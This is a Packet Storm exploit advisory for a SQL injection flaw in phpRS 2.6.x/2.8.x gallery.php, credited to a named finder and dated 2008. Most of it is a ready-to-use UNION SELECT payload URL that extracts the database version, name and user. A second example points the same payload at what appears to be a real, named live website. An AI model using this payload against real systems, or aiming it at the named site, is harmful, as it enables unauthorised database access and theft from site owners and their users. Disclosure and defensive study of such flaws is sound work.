phpRS versions 2.6.x and 2.8.x suffer from a remote SQL injection vulnerability in gallery.php.
cd37a62705b90092cec6ee3361131b1700931e182692ee03102eb885c5ef7e27[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
[~] phpRS 2.6.x and 2.8.X (gallery.php) SQL Injection Vulnerability
[~]
[~] https://www.supersvet.cz/download.php
[~]
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 20.11.2008
[~]
[~]
[~] d3v1l@spoofer.com https://security-sh3ll.com
[~]
[~]
------------------------------------------------------------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( https://security-sh3ll.com/forum.php )
[~]
[~] milw0rm <-> packetstorm staff
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
[~] Exploit :- gallery.php?akce=obrazek_ukaz&media_id=
[~]
[~] https://site.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNION SELECT
1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]
[~] Ex :-
[~]
[~] https://www.kobravs.com/gallery.php?akce=obrazek_ukaz&media_id=1'UNIONSELECT
1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16/*
[~]---------------------------------------------------------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed